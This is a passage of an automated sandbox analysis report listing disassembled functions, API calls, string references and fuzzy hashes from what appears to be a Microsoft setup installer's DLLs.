                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3Last$CloseOpenQueryValue
                                                                                              • String ID: Failed to record IsAdmin$Failed to record IsInternal$PerfLab$Software\Microsoft\DevDiv
                                                                                              • API String ID: 716194244-1174128248
                                                                                              • Opcode ID: 97481d079971485e3675b031ba79ac832227fe6acfd36366aed34bf84ab6b61c
                                                                                              • Instruction ID: 5c4da67ff7ab7ca6f2a2ea9d2aff292ce8fd6f7e3c65fddd9d00d0175413d390
                                                                                              • Opcode Fuzzy Hash: 97481d079971485e3675b031ba79ac832227fe6acfd36366aed34bf84ab6b61c
                                                                                              • Instruction Fuzzy Hash: 6531C671B00245EBD710CFA9CE059AE7BB9BF96358B200A2DE420E7B90C774DA05D661
                                                                                              Function 6C8C76AC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C76B3
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00000010,00000104), ref: 6C8C7711
                                                                                              • GetFileVersionInfoSizeW.KERNELBASE(00000010,?), ref: 6C8C772A
                                                                                              • GetFileVersionInfoW.KERNELBASE(00000010,?,00000000,00000000), ref: 6C8C7745
                                                                                              • VerQueryValueW.VERSION(00000000,6C8A496C,?,?), ref: 6C8C775D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$H_prolog3InfoVersion$ModuleNameQuerySizeValue
                                                                                              • String ID: %d.%d.%d.%d$0.0.0.0
                                                                                              • API String ID: 1538924429-464342551
                                                                                              • Opcode ID: d3657c1b4862397d7d7c4f2e62d8de4f0da10e7fb967135d59f9d4b9e19cb46b
                                                                                              • Instruction ID: 35943a3899e74b740800cf146d3b467568752a3ecf3295c1604914bc3315f4a6
                                                                                              • Opcode Fuzzy Hash: d3657c1b4862397d7d7c4f2e62d8de4f0da10e7fb967135d59f9d4b9e19cb46b
                                                                                              • Instruction Fuzzy Hash: CD318DB1A01219AFDB14DFA4CD84CBFB7B9BF55318B10492AE411A7B90D730D916DBA0
                                                                                              Function 6C8F7E78 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F7E7F
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8380: __EH_prolog3.LIBCMT ref: 6C8F8387
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: AlwaysUploaded$Disabled$Unknown$User Experience Data Collection Policy$User Experience Data Collection Policy: %s$UserControlled
                                                                                              • API String ID: 431132790-3357067047
                                                                                              • Opcode ID: a43c57af834fe7d519b92366a4fd54d52fe480bf2064c6760e8f0d7a3a9244a6
                                                                                              • Instruction ID: 19884b2659e1774347593b7b38a295a61ef7bde743bd52df9ada0741592581b9
                                                                                              • Opcode Fuzzy Hash: a43c57af834fe7d519b92366a4fd54d52fe480bf2064c6760e8f0d7a3a9244a6
                                                                                              • Instruction Fuzzy Hash: 7E219171904109ABDF10DBE8CA45EDEBBF9AF25308F144856E160F7B81C734DA0AD7A5
                                                                                              Function 6C8E75C2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E75C9
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • OpenFileMappingW.KERNEL32(00000002,00000000,00000000,?,6C8BAB18,00000008,6C8E76FE,?,?,00000004,6C90C454,?,6C8B95D4,00000000,00000001,?), ref: 6C8E75F2
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000001), ref: 6C8E75FF
                                                                                                • Part of subcall function 6C8CC338: __EH_prolog3.LIBCMT ref: 6C8CC33F
                                                                                                • Part of subcall function 6C8F8CD5: __EH_prolog3.LIBCMT ref: 6C8F8CDC
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000424,?,?,?,?,00000001), ref: 6C8E7654
                                                                                              • UnmapViewOfFile.KERNEL32(00000000,?,0000021A,?,?,?,?,00000001), ref: 6C8E7670
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000001), ref: 6C8E7679
                                                                                              Strings
                                                                                              • OpenFileMapping fails with last error: , xrefs: 6C8E760F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$File$View$CloseErrorHandleLastMappingOpenUnmap
                                                                                              • String ID: OpenFileMapping fails with last error:
                                                                                              • API String ID: 2964829354-1738344248
                                                                                              • Opcode ID: cd3ad49fd0cc917af3889bdae8576c60ed94473393176100c3971fc2dd33a075
                                                                                              • Instruction ID: d7f6e9a0c834de5b7b750e96f41b10bd6b0275f9626be62624037d9e96f3149e
                                                                                              • Opcode Fuzzy Hash: cd3ad49fd0cc917af3889bdae8576c60ed94473393176100c3971fc2dd33a075
                                                                                              • Instruction Fuzzy Hash: D9215B71600118ABCB20DFA9CA09EDE7BB5FF5A358F108625F9259BB54C730CA05DB91
                                                                                              Function 6C90ACD8 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C90ACDF
                                                                                              • GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000000,00000000,00000009,0000000C,6C8F49C0,6C8BA5D8,6C8BA54C), ref: 6C90AD06
                                                                                              • GetLastError.KERNEL32 ref: 6C90AD08
                                                                                              • GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000008,00000400,00000400,80070216), ref: 6C90AD81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: InformationToken$ErrorH_prolog3_Last
                                                                                              • String ID:
                                                                                              • API String ID: 654496852-0
                                                                                              • Opcode ID: b4fde8c31d97e8d97b86eb9506b595eb307f986b8159bf66c1fa8a7ade4e94e0
                                                                                              • Instruction ID: 773eb9620879b6b3c4a30463da43112d88eee35ce4d2ccbd566bcaa720469f7e
                                                                                              • Opcode Fuzzy Hash: b4fde8c31d97e8d97b86eb9506b595eb307f986b8159bf66c1fa8a7ade4e94e0
                                                                                              • Instruction Fuzzy Hash: 06310132B40529DBCF11CF68C941ADE77B9AF15B69B214019E940BBA50CB30CE45CBE0
                                                                                              Function 6C8D5E2B Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 169COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C8C5D3F: __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                                • Part of subcall function 6C8C5D3F: GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                                • Part of subcall function 6C8D5B82: __EH_prolog3_GS.LIBCMT ref: 6C8D5B8C
                                                                                                • Part of subcall function 6C8D5B82: _memset.LIBCMT ref: 6C8D5BBB
                                                                                                • Part of subcall function 6C8D5B82: FindFirstFileW.KERNEL32(?,?,????), ref: 6C8D5BDA
                                                                                                • Part of subcall function 6C8D5B82: FindClose.KERNEL32(?), ref: 6C8D5CC1
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D5FF0
                                                                                                • Part of subcall function 6C918EAB: _memcpy_s.LIBCMT ref: 6C918EFC
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                              • PathFileExistsW.SHLWAPI(?,LocalizedData.xml,?,?,?,38D98A99,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C8D5EF1
                                                                                                • Part of subcall function 6C8D5CE1: __EH_prolog3.LIBCMT ref: 6C8D5CE8
                                                                                                • Part of subcall function 6C8D5CE1: CoInitialize.OLE32(00000000), ref: 6C8D5D1A
                                                                                                • Part of subcall function 6C8D5CE1: CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,?,00000014,6C8D5F14,?,?,?,?,38D98A99,ParameterInfo.xml,00000000), ref: 6C8D5D38
                                                                                                • Part of subcall function 6C8D5CE1: CoUninitialize.COMBASE(?,?,00000014,6C8D5F14,?,?,?,?,38D98A99,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 6C8D5DE8
                                                                                                • Part of subcall function 6C8D5CE1: SysFreeString.OLEAUT32(00000738), ref: 6C8D5DF1
                                                                                              Strings
                                                                                              • LocalizedData.xml in resource folder %s, does not have a Language element, xrefs: 6C8D5F87
                                                                                              • ParameterInfo.xml, xrefs: 6C8D5E45, 6C8D5FA2
                                                                                              • LocalizedData.xml, xrefs: 6C8D5EDF
                                                                                              • LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml, xrefs: 6C8D6026
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$FindH_prolog3Path$AppendCloseCreateException@8ExistsFirstFreeH_prolog3_InitializeInstanceModuleNameStringThrowUninitialize_memcpy_s_memset
                                                                                              • String ID: LocalizedData.xml$LocalizedData.xml in resource folder %s, does not have a Language element$LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml$ParameterInfo.xml
                                                                                              • API String ID: 2922719316-412676173
                                                                                              • Opcode ID: 4563567076355a4f2a6407e931460d3e8ab3a9c938767b49ab543d3f47ec5c22
                                                                                              • Instruction ID: 7b6e62eb53a7512f4f01bfd39ae3e68f61630d3e35f6dbcb4f84ff2e11598351
                                                                                              • Opcode Fuzzy Hash: 4563567076355a4f2a6407e931460d3e8ab3a9c938767b49ab543d3f47ec5c22
                                                                                              • Instruction Fuzzy Hash: F2615A725083859FC710DFA8C944A8AB7E8FF95318F054E6EF0A59BA51DB30E509CB93
                                                                                              Function 6C90401F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C904026
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • GetThreadLocale.KERNEL32(?,DHTMLHeader.html), ref: 6C904041
                                                                                              • GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104), ref: 6C9040B3
                                                                                              • PathFileExistsW.SHLWAPI(?,00000014,00000000), ref: 6C904101
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileH_prolog3$ExistsLocaleModuleNamePathThread
                                                                                              • String ID: %04d\%s$DHTMLHeader.html
                                                                                              • API String ID: 3575165106-1224721414
                                                                                              • Opcode ID: 604e8d05463472135efceb022f45c16a2a3545a7adafd62123dc7fbb9e8f4cfc
                                                                                              • Instruction ID: fbe2d60e5570541ccf17fb55cda9627a67788a9b5c6a0c51ca69074f69f9cb5b
                                                                                              • Opcode Fuzzy Hash: 604e8d05463472135efceb022f45c16a2a3545a7adafd62123dc7fbb9e8f4cfc
                                                                                              • Instruction Fuzzy Hash: 4241A27191010ADFCF14DFA8CC45AEEBBB5BF21318F104929E111A7B51DB34DA0ACB94
                                                                                              Function 639533F3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639533FA
                                                                                              • LoadLibraryW.KERNELBASE(?,00000008,63953377,?), ref: 63953427
                                                                                              • GetLastError.KERNEL32 ref: 63953437
                                                                                                • Part of subcall function 6394B93E: __EH_prolog3.LIBCMT ref: 6394B945
                                                                                              • GetLastError.KERNEL32 ref: 6395344B
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6395346E
                                                                                              Strings
                                                                                              • ::LoadLibrary(%s) failed with error %d, xrefs: 6395343C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3Last$Exception@8LibraryLoadThrow
                                                                                              • String ID: ::LoadLibrary(%s) failed with error %d
                                                                                              • API String ID: 3804648058-20907036
                                                                                              • Opcode ID: 7cbfec88d4243ec72b6c96a8fa5f5efb775a09f2fd4e93375f161ba9c91e331f
                                                                                              • Instruction ID: ab2b43ed1b83d98d8045248c50b4c915a44568a2cf0f2cc702181b8879a157f7
                                                                                              • Opcode Fuzzy Hash: 7cbfec88d4243ec72b6c96a8fa5f5efb775a09f2fd4e93375f161ba9c91e331f
                                                                                              • Instruction Fuzzy Hash: 7F01DFB18042069FEB10EFA8C844B6E7BB0FF12B04F108124E018DF242DB30D9218FA1
                                                                                              Function 6C8C5485 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C548C
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,6C8C7DAF,?,?,?,?,?,00000000,?,?,6C8BAB18,00000008,6C8C7CD9), ref: 6C8C549C
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 6C8C54B9
                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 6C8C54E0
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$AddressHandleInfoModuleNativeProcSystem
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                              • API String ID: 2427612476-192647395
                                                                                              • Opcode ID: 6e04438b3e998a018113ca28b73e3ed3c219a15aa55988f34e923a885d621473
                                                                                              • Instruction ID: d12d55b0574c0ff579d1d485eecbc9c689114f4a13bc88cd2af578b6d7a23540
                                                                                              • Opcode Fuzzy Hash: 6e04438b3e998a018113ca28b73e3ed3c219a15aa55988f34e923a885d621473
                                                                                              • Instruction Fuzzy Hash: 02F0C231B10615ABDF20DBA4DA04BCE3276AB90309F108C24F000E7F00DBBCD549E695
                                                                                              Function 63963E60 Relevance: 9.0, APIs: 6, Instructions: 49windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63963E67
                                                                                              • SetWindowLongW.USER32(?,000000F4,00000066), ref: 63963E7B
                                                                                                • Part of subcall function 6394FF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                              • GetParent.USER32(?), ref: 63963EB7
                                                                                              • SendMessageW.USER32(00000000,00000485,00000000,00000066), ref: 63963EC2
                                                                                              • GetParent.USER32(?), ref: 63963ECF
                                                                                              • GetDesktopWindow.USER32 ref: 63963ED4
                                                                                                • Part of subcall function 63968E26: HeapFree.KERNEL32(00000000,00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E3C
                                                                                                • Part of subcall function 63968E26: GetLastError.KERNEL32(00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1093383602-0
                                                                                              • Opcode ID: 491848130d23c3b46c4025fa47c59850825ca860e0373fed2c41d433f4c843bd
                                                                                              • Instruction ID: 4ba417e681d4c52cc61d15ed7d0c7eee25b377d5ce541d2d133f48751edcb591
                                                                                              • Opcode Fuzzy Hash: 491848130d23c3b46c4025fa47c59850825ca860e0373fed2c41d433f4c843bd
                                                                                              • Instruction Fuzzy Hash: D6111870D00708DFDB21EFA9C98499EBBF4BF9AB44B10451AE125EB2A0DB71D910CF50
                                                                                              Function 6C8FF8D1 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C8FF8D8
                                                                                              • GetCommandLineW.KERNEL32(00000044,6C8F8323,00000000), ref: 6C8FF8EA
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                              • __time64.LIBCMT ref: 6C8FFA7B
                                                                                                • Part of subcall function 6C8F72E4: __EH_prolog3_catch.LIBCMT ref: 6C8F72EB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_catch$CommandH_prolog3Line__time64
                                                                                              • String ID: %TEMP%\$Setup
                                                                                              • API String ID: 3716462386-3413213476
                                                                                              • Opcode ID: 1d73eb0969d54761b97ff035e6bc2467b3987314472f1be157ee755fc1a58ed8
                                                                                              • Instruction ID: 90f7b5424578708fb97b8aafb355cd9bb1b90ab4ffe62f72c854c215609c49d2
                                                                                              • Opcode Fuzzy Hash: 1d73eb0969d54761b97ff035e6bc2467b3987314472f1be157ee755fc1a58ed8
                                                                                              • Instruction Fuzzy Hash: 92713A719002099FCB10CFA8CA84AEDBBF5BF59318F24456AE461B7790DB349A49CB61
                                                                                              Function 6C8E3EB2 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E3EB9
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: ProcessBlocks$ProductDriveHints$ServiceBlocks$SystemCheck
                                                                                              • API String ID: 431132790-3784926136
                                                                                              • Opcode ID: cb3ca5ce9fc7ddcbd0a0ee4fbb8115be6168f268398476f06b43ba0c0180cf1c
                                                                                              • Instruction ID: 45a798294f2a57743a34112c59c52016665cd73f30d8a8e7e171e526917ded59
                                                                                              • Opcode Fuzzy Hash: cb3ca5ce9fc7ddcbd0a0ee4fbb8115be6168f268398476f06b43ba0c0180cf1c
                                                                                              • Instruction Fuzzy Hash: BA517071904249EFDF10DFA8CA45AEE7BB9AF0A318F144959F814DB781C734DA05CB61
                                                                                              Function 6C8F5691 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F5698
                                                                                              • PathIsRelativeW.SHLWAPI(00000000,?), ref: 6C8F5735
                                                                                              • PathFileExistsW.SHLWAPI(00000001,?), ref: 6C8F57C3
                                                                                              Strings
                                                                                              • pLocalPath is NULL!!!!!!, xrefs: 6C8F585B
                                                                                              • Package authoring error. The Url for this item is not authored and the item does not exist locally: , xrefs: 6C8F57FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ExistsFileH_prolog3Relative
                                                                                              • String ID: Package authoring error. The Url for this item is not authored and the item does not exist locally: $pLocalPath is NULL!!!!!!
                                                                                              • API String ID: 1035510722-3253188715
